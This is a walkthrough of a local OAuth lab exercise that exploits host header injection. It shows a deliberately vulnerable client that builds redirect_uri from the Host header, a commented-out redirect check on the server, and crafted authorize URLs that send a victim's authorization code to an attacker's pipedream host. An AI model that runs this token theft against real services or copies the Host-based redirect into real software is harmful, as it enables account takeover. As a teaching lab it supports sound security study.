This is an exercise that exploits the host header injection vulnerability. The goal is to gail access token that tied to victim's account.
$ git clone https://github.com/melonattacker/oauth-exploit-lab.git
$ cd oauth-exploit-lab/exercise/ex3
$ docker-compose up -d
| target | URL |
|---|---|
| client | http://localhost:10000 |
| username | password |
|---|---|
| bob(attacker) | hoge |
| tom(victim) | huga |
Looking at line 89 of client/app.py, you can see that redirect_uri is generated based on the Host header.
authorize_url: str = build_url(auth_server['authorization_endpoint'], {
'response_type': 'code',
'client_id': client['client_id'],
# 'redirect_uri': client['redirect_uris'][0],
'redirect_uri': 'http://' + request.host + '/callback',
'state': state,
'scope': client['scope']
})And you can see that the verification of redirect_uri in the authorization server is insufficient.
# if request.args.get('redirect_uri') not in client['redirect_uris']:
# print('Mismatched redirect URI, expected %s but got %s' % (client['redirect_uris'], request.args.get('redirect_uri')))
# return render_template('error.html', error='Invalid redirect URI')This makes it vulnerable to host header injection. To exploit this, an attacker go through the authorization process under his account and modify http host header to his owned server. Then make the victim click on the link.
First login as bob(attacker), and click Get OAuth Token button. Capture the request with burp suite and rewrite the host header to the attacker's server(In this example, RequestBin server).
Copy the GET request URL by forwarding the request. then let the request drop.
/authorize?response_type=code&client_id=oauth-client-1&redirect_uri=http%3A%2F%2Feoxnypfvopbmt6n.m.pipedream.net%2Fcallback&state=Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73&scope=hoge+huga
Then login as tom(victim) and access the below URL.
http://localhost:10001/authorize?response_type=code&client_id=oauth-client-1&redirect_uri=http%3A%2F%2Feoxnypfvopbmt6n.m.pipedream.net%2Fcallback&state=Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73&scope=hoge+huga
Approving the client sends an authorization code to the attacker's server.
Log in as bob(attacker) and access the following URL to issue an access token.
http://localhost:10000/callback?code=JSKKNENI&state=Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73
Press the Get Protected Resource button to see tom's resources.
